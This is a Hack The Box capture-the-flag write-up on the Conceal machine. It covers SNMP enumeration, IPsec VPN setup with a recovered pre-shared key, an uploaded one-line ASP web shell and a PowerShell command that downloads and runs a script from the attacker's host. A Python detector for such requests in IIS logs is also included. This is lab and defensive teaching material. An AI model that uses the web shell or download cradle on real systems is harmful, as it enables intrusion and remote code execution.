Conceal-HTB

Nmap

This machine does not let you scan the TCP ports directly, so I had to use UDP, and that did work.

We see UDP port 161 (SNMP), so we try snmpwalk:

snmpwalk -v 2c -c public 10.10.10.116

We find what looks like a password:

VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"

IKE - UDP 500

We have to connect via IPsec.

UDP 500 is used for Internet Key Exchange (IKE), which is used to establish an IPSEC VPN. There is some recon I can do on the IKE using ike-scan:

ike-scan -M 10.10.10.116

Based on what HackTricks says, we can see what type of connection it uses. The problem here is the configuration.

sudo apt install strongswan

To configure it you have to edit these files. There are several ways to do this, but this is the one that worked for me. /etc/ipsec.conf:

# ipsec.conf - strongSwan IPsec configuration file

config setup
    charondebug="all"
    uniqueids=yes
    strictcrlpolicy=no

conn conceal
    authby=secret
    auto=add
    ike=3des-sha1-modp1024!
    esp=3des-sha1!
    type=transport
    keyexchange=ikev1
    left=10.10.14.15
    right=10.10.10.116
    rightsubnet=10.10.10.116[tcp]

Now we edit ipsec.secrets:

# This file holds shared secrets or RSA private keys for authentication.

%any : PSK "Dudecake1!"

Then you connect with:

ipsec up conceal

If it does not work, try restarting the connection:

ipsec restart

Once connected, we have access to all the ports.

IIS server

There is an upload folder; we upload shell.asp there:

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

And then, with the reverse shell...

http://10.129.228.122/upload/shell.asp?cmd=powershell%20iex(new-object%20net.webclient).downloadstring(%27http://10.10.15.72/shell.ps1%27)
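
From the defender's side, requests like the one above leave a recognisable trail in the IIS W3C access log. The following is an added example, not part of the original write-up: it scans such a log for script files executed from an upload directory with a command parameter. The log lines are constructed, and the function name, the /upload/ prefix and the extension list are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (documentation IPs, not from the target host).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-01-05 10:00:01 192.0.2.5 GET /index.html - 80 - 192.0.2.9 Mozilla/5.0 200
2019-01-05 10:02:40 192.0.2.5 GET /upload/shell.asp cmd=whoami 80 - 192.0.2.9 curl/7.61 200
2019-01-05 10:03:02 192.0.2.5 GET /upload/shell.asp cmd=powershell%20iex(new-object%20net.webclient).downloadstring(%27http://192.0.2.9/s.ps1%27) 80 - 192.0.2.9 curl/7.61 200
2019-01-05 10:04:00 192.0.2.5 GET /upload/report.pdf - 80 - 192.0.2.7 Mozilla/5.0 200
"""

# Assumed indicators: server-side script extensions, the "cmd" parameter used
# by the one-line ASP shell, and tokens of a PowerShell download cradle.
SCRIPT_EXT = (".asp", ".aspx", ".ashx")
CMD_PARAM = re.compile(r"(?:^|&)cmd=", re.I)
CRADLE = re.compile(r"powershell|downloadstring|net\.webclient|\biex\b", re.I)

def find_webshell_hits(log_text, upload_prefix="/upload/"):
    """Return (client_ip, uri_stem, reasons) for suspicious requests."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column order is set by this header
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        stem = row.get("cs-uri-stem", "").lower()
        query = unquote_plus(row.get("cs-uri-query", "-"))  # decode %20, %27, +
        # Only script files served from the upload directory are of interest.
        if not (stem.startswith(upload_prefix) and stem.endswith(SCRIPT_EXT)):
            continue
        reasons = ["script-in-upload-dir"]
        if CMD_PARAM.search(query):
            reasons.append("command-parameter")
        if CRADLE.search(query):
            reasons.append("powershell-download-cradle")
        hits.append((row.get("c-ip"), row.get("cs-uri-stem"), reasons))
    return hits

if __name__ == "__main__":
    for ip, stem, reasons in find_webshell_hits(SAMPLE_LOG):
        print(ip, stem, ", ".join(reasons))
```

The first indicator alone is worth alerting on: an upload directory should not have script execution enabled, so any .asp request served from it with a 200 status points at a handler mapping that needs to be removed.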

We can use Juicy Potato.

Contributor: gecr07